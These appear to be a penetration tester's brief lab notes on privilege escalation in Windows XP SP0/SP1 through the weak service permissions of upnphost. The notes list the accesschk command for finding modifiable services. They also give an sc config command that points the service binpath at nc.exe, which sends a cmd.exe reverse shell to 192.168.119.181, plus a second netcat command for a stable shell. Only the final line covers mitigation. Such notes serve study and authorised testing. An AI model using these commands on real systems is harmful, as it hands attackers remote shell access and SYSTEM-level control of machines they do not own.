Windows XP SP0/SP1 Priv esc
This vuln didn't show up on windows exploit suggester.
if the system meets the requirement,
transfer the exe file with binary mode
C:\> accesschk.exe /accepteula -uwcqv "Authenticated Users" *
once you follow everything from the article, you can upload a nc.exe to the victim
sc config upnphost binpath= "C:\Inetpub\Scripts\nc.exe -nv 192.168.119.181 6666 -e C:\WINDOWS\System32\cmd.exe"
To get a stable shell, immediately run the following command (check the path)
C:\inetpub\scripts\nc.exe -nv 192.168.119.181 4445 -e C:\WINDOWS\System32\cmd.exe
Mitigation is upgrade to Windows XP SP2 or higher